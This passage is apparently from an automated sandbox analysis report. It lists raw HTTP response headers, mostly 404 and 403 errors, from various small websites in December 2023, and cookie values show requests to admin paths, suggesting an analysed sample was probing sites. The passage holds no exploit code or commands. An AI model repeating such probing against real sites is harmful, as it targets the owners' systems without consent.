yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLg+F4RAy97FgBhKEMuS3Uv05XEckg9t2+jA6cQOj+vGJ,2d58ifebGbosy5xc+FRaltG2RURvCFm5ir7lafpU/1JySMfSQraj4cC6gt/T0A6a0+KQ8HJWQNHbFuFUvcq3ww==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,yRDaoXC/28ywKHhtXtgYjDFl/6Qyk2dCxDV7WouodNs=,WDMzHiyOL7uW518fW2ByrxD4X4GGeFX8Xll+nL3Pc+E4qaYh8SZeolIa32w52W7D4AMi8pzlO6fsIL/n0plsbA==Transfer-Encoding: chunkedVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:02 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cachePragma: no-cacheContent-Type: text/html; charset=utf-8Expires: -1X-Result-Reason: Not RedirectedX-UrlRewriter-404: 404 Rewritten to DNN Tab : 404 Error Page(Tabid:37) : Reason Requested_404X-UA-Compatible: IE=edgeSet-Cookie: dnn_IsMobile=False; path=/; HttpOnlySet-Cookie: __RequestVerificationToken=x9dznwB6-fthLZ5jgEbmbVF66pLEB18zFPbokLKb5_FUvunxyt5nFAxMioMxhODNsJocLA2; path=/; HttpOnlyX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINDate: Fri, 22 Dec 2023 20:15:07 GMTConnection: closeContent-Length: 33332
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: private, no-storex-request-id: 3c9eb11d-4b7b-4199-b341-d80991657642via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZWcXIBENXueb0kGdpn8RKTygoPg50J0p9Hk6ncbeUC77WjITem8%2F%2Bj7hOvWFlSRIk52Nb48kvKfqIwitGt2o9gb2bLUG2DFtUKBVxxqTHbaKUggSBv6FpxD2hwDu2q0QoOvvEA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08f5ee5a8e00-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.15Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Cache-Control: s-maxage=10Link: <https://theproducebox.com/wp-json/>; rel="https://api.w.org/"Set-Cookie: PHPSESSID=95k725o8r56plni6v2rurnt9ml; path=/X-Frame-Options: SAMEORIGINCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y05DdjSBlH%2F32DHS7xKecGv%2FlE5hO8SwTySVHml%2BS3LmJkaujFyDKnpfNClmfLqJX5Gkx89WXJZ%2FjXRrLvv%2B7qpjFKqfRo02Px5LZDTZPW%2B0Wm8RcXyklDmoDy905fALkpVv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08f64bc225a3-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 839b08f2ac582239-MIACF-Cache-Status: MISSCache-Control: public, s-maxage=300, max-age=30, stale-if-error=21600, stale-while-revalidate=15Strict-Transport-Security: max-age=31536000Vary: Accept-EncodingContent-Security-Policy: Referrer-Policy: strict-origin-when-cross-originX-Content-Type-Options: nosniffX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-Request-Id: b49c53d6-ebc3-4129-8e00-b20ba70a014eX-Runtime: 0.627405X-Xss-Protection: 1; mode=blockServer: cloudflarealt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 2929Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1703276107.453170988273848858Cache-Control: public,max-age=0,must-revalidateServer: Pepyaka/1.19.10X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 22 Dec 2023 20:15:07 GMTAge: 5X-Served-By: cache-dfw-kdfw8210043-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=hit, varnish;desc=hit_miss, dc;desc=fastly_42_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLm+RUUxFrhyTYE58WvxHjkkcm7On4dir39PTYYK13tG9,2d58ifebGbosy5xc+FRalpGMksnd3IwBAt8vQj5PWppYzrBY4ZCZ7qfk0aaye0TuqG9EI0zcyI4825B9mshKCg==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nLVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://www.conquestaccounting.com.au/wp-json/>; rel="https://api.w.org/"cache-control: no-cache, must-revalidate, max-age=0x-cacheable: yesx-litespeed-cache-control: public,max-age=3600x-litespeed-tag: fed_HTTP.404,fed_404,fed_URL.1e5f09d904a9efd2fc928c187452329f,fed_x-litespeed-cache: misstransfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:15:07 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:15:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingSet-Cookie: apbct_timestamp=1703276107; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_landing_ts=1703276107; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522a5e496c8b5111dcd746f99995c2a0fed%2522%257D; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_urls=%7B%22jaydien.com%2Fadmin%22%3A%5B1703276107%5D%7D; expires=Mon, 25 Dec 2023 20:15:07 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:15:07 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxExpires: Fri, 01 Jan 71 00:00:00 +0000Pragma: no-cacheX-Powered-By: WP EngineX-Cacheable: NO:403Cache-Control: max-age=0, must-revalidate, privateX-Cache: MISSX-Cache-Group: normalCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 839b08f99d1b12a7-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1703276108.0391710967552118108Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 22 Dec 2023 20:15:08 GMTX-Served-By: cache-dfw-kdfw8210064-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLl77sBeKLtHVaXbFQUDNQYPu/2EjeiyKjB/JVOb8T5Ve,2d58ifebGbosy5xc+FRaliLS65Gchd7liiJBMWem/INlXLezy9ToUd017cVYlCANhcwCyQrKJIG5Qj+FSBkgbQ==,2UNV7KOq4oGjA5+PKsX47JzIq9ZmP05BQuFbD4KFyTFYgeUJqUXtid+86vZww+nL,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,yRDaoXC/28ywKHhtXtgYjDFl/6Qyk2dCxDV7WouodNs=,WDMzHiyOL7uW518fW2ByrxD4X4GGeFX8Xll+nL3Pc+E4qaYh8SZeolIa32w52W7D4AMi8pzlO6fsIL/n0plsbA==Transfer-Encoding: chunkedVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:08 GMTServer: Apache / ZoneOSConnection: Upgrade, closeLast-Modified: Mon, 23 Oct 2023 21:31:51 GMTETag: "1d7b-60868f3479039"Accept-Ranges: bytesContent-Length: 7547Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.3.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:15:08 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 2929Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1703276107.453170988273848858Cache-Control: public,max-age=0,must-revalidateServer: Pepyaka/1.19.10X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 22 Dec 2023 20:15:09 GMTAge: 7X-Served-By: cache-dfw-kdfw8210074-DFWX-Cache: HITVary: Accept-EncodingServer-Timing: cache;desc=hit, varnish;desc=hit_hit, dc;desc=fastly_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==Via: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: private, no-storex-request-id: d73c3961-6dd1-4b64-9e30-20d161e64e9bvia: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vRji%2Bm9l5PoPOlEdcXl9hGWtyssleO6%2FjhWBLNsvRgTuqLcwfJwpzMVE309RUCFjdCsATzet6e2GIES0iSAZg4%2BQzQZnf1zOuOYfZovw1HHtn9UHXhxPxiGuymf08sB3xW9mOQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b090a4be50345-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:15:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingSet-Cookie: apbct_timestamp=1703276110; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_landing_ts=1703276110; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%25226abce91ea6b8965dfd33f22fbcd48a25%2522%257D; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_urls=%7B%22jaydien.com%2Fadmin%22%3A%5B1703276110%5D%7D; expires=Mon, 25 Dec 2023 20:15:10 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:15:10 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxExpires: Fri, 01 Jan 71 00:00:00 +0000Pragma: no-cacheX-Powered-By: WP EngineX-Cacheable: NO:403Cache-Control: max-age=0, must-revalidate, privateX-Cache: MISSX-Cache-Group: normalCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 839b090a3d213340-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: private, no-storex-request-id: 701c518c-f570-4e12-bac9-abf8ce81a6b8via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C08DiDONiOZRrQs2xVCdR%2FujNSl7FfVrkhs7MJRixQX1vRMi%2FsHl2RRQzfW3Ww1ZBpS5%2BGLV97%2FaIhFSQLTtqPfcwvZy%2Fs0zWZGE2kCksHJrgP%2Behen131eDxDa0lcRDWGiJag%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b090c8ca76dad-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cachePragma: no-cacheContent-Type: text/html; charset=utf-8Expires: -1X-Result-Reason: Not RedirectedX-UrlRewriter-404: 404 Rewritten to DNN Tab : 404 Error Page(Tabid:37) : Reason Requested_404X-UA-Compatible: IE=edgeSet-Cookie: dnn_IsMobile=False; path=/; HttpOnlySet-Cookie: __RequestVerificationToken=31z5xtnHMpNPA4Ijz--Qd5w5_vgF2KoD2pgUgQQANnNOPVdm1MTZ6Xx1gAabyZGaZiPgFQ2; path=/; HttpOnlyX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINDate: Fri, 22 Dec 2023 20:15:11 GMTConnection: closeContent-Length: 33332
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 839b090cdccf25e3-MIACF-Cache-Status: MISSCache-Control: public, s-maxage=300, max-age=30, stale-if-error=21600, stale-while-revalidate=15Strict-Transport-Security: max-age=31536000Vary: Accept-EncodingContent-Security-Policy: Referrer-Policy: strict-origin-when-cross-originX-Content-Type-Options: nosniffX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-Request-Id: ea80f6ed-4132-4fe3-a861-1c0719970084X-Runtime: 0.584906X-Xss-Protection: 1; mode=blockServer: cloudflarealt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://www.conquestaccounting.com.au/wp-json/>; rel="https://api.w.org/"cache-control: no-cache, must-revalidate, max-age=0x-cacheable: yesx-litespeed-cache-control: public,max-age=3600x-litespeed-tag: fed_HTTP.404,fed_404,fed_URL.0045a36e9aa35622a617ea518918c32d,fed_x-litespeed-cache: misstransfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:15:11 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.3.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:15:12 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:15:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()cf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vpxZsnFrTAz%2BeJIbgSz9dY8QLOvcKtOaoFX64NYTWQJDRmeM3%2B3etsW%2B5bOBomJp7orXOiXmUIqPm7tL%2FbK3hcwncuxfT7ZQhVgP8alPxqODfcQYGknQnkoRJBxsdt8%2Bjw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 839b0918ed937498-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:15:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingSet-Cookie: apbct_timestamp=1703276113; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_landing_ts=1703276113; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%25226ac55ec79b310cf67b6e7d2d254a24f7%2522%257D; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_urls=%7B%22jaydien.com%2Fadmin%2F%22%3A%5B1703276113%5D%7D; expires=Mon, 25 Dec 2023 20:15:13 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:15:13 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxExpires: Fri, 01 Jan 71 00:00:00 +0000Pragma: no-cacheX-Powered-By: WP EngineX-Cacheable: NO:403Cache-Control: max-age=0, must-revalidate, privateX-Cache: MISSX-Cache-Group: normalCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 839b09199f15099e-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:12 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:12 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: private, no-storex-request-id: 1749b7da-d2ee-4d3f-b16e-d0be342102b9via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j8z5vYYP7AzTeNBPj6%2BWtf%2FgwrUTsABn%2BDGyF7xiKRXQmQfvj4KgQ4SyluLJHnVmwHuW61%2B%2FLHf9zxH1%2FwxktyQyhhmBpVEZsOFSbmjFeSZ1Ic6U%2BbSiUN%2B7Orddhga1fBKBCA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b0921bc42da8f-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 839b0921aec5dad5-MIACF-Cache-Status: EXPIREDCache-Control: public, s-maxage=300, max-age=30, stale-if-error=21600, stale-while-revalidate=15Strict-Transport-Security: max-age=31536000Vary: Accept-EncodingContent-Security-Policy: Referrer-Policy: strict-origin-when-cross-originX-Content-Type-Options: nosniffX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-Request-Id: 75e16e72-1fa8-4cf8-bf00-e639192e4f6aX-Runtime: 0.692388X-Xss-Protection: 1; mode=blockServer: cloudflarealt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: private, no-storex-request-id: 3cf0d346-24c0-4780-b601-59ed24b28086via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kBDGe4N4EnUc3pAeo1cJ45pHobdSxTR8RSqMxJRPbDiq8%2B1PtdDSgDzocUSwZK1pJW2JfnMxpp2cBGTD1m7zwwYSVb3XJlTH5gCr298XGCSfgmdydSGcO2mMHM%2B0tKYlayF1FA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b0929f8d88d97-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cachePragma: no-cacheContent-Type: text/html; charset=utf-8Expires: -1X-Result-Reason: Not RedirectedX-UrlRewriter-404: 404 Rewritten to DNN Tab : 404 Error Page(Tabid:37) : Reason Requested_404X-UA-Compatible: IE=edgeSet-Cookie: dnn_IsMobile=False; path=/; HttpOnlySet-Cookie: __RequestVerificationToken=lv8u40yKPPUMIKDIgRNHzmyM17-_9dV0J8sAUK195alUcXGzQkdn_ziuk0BDU6sZrT1Xdw2; path=/; HttpOnlyX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINDate: Fri, 22 Dec 2023 20:15:15 GMTConnection: closeContent-Length: 33325
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:15:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()cf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=57o6boY%2BcrMItg8UuoCCbCbf1ubRXgZSrAraB5nuvd1Cj%2FcJ0UbfKrzDm3FmnQbBAytPJA83n%2BcRHX%2Fca2UEazfnZb3ESt46YC1i55f%2BRyeLk5DHr3tgU2%2FUzJOY6AiKRA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 839b092dfc0b8e00-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://www.conquestaccounting.com.au/wp-json/>; rel="https://api.w.org/"cache-control: no-cache, must-revalidate, max-age=0x-cacheable: yesx-litespeed-cache-control: public,max-age=3600x-litespeed-tag: fed_HTTP.404,fed_404,fed_URL.357809cc79cfd436f9911313d967e82f,fed_x-litespeed-cache: misstransfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:15:16 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: private, no-storex-request-id: a305c6c8-a29f-4821-b27e-ae01f039c799via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xYTsc%2BlpMFpI9pHmnBc7yqtU2B834ThE8k5hIfyXFUfVb%2BW3GAJ8bn2NHpIvTegoCg4V9QH0B6c1n5wIr%2FnvqQQM9P3XwlpubqBOjG5P%2BcPz5ZM1yG0xLDcsFBzLM3qN6kWlIg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b0930e907d9dd-MIA
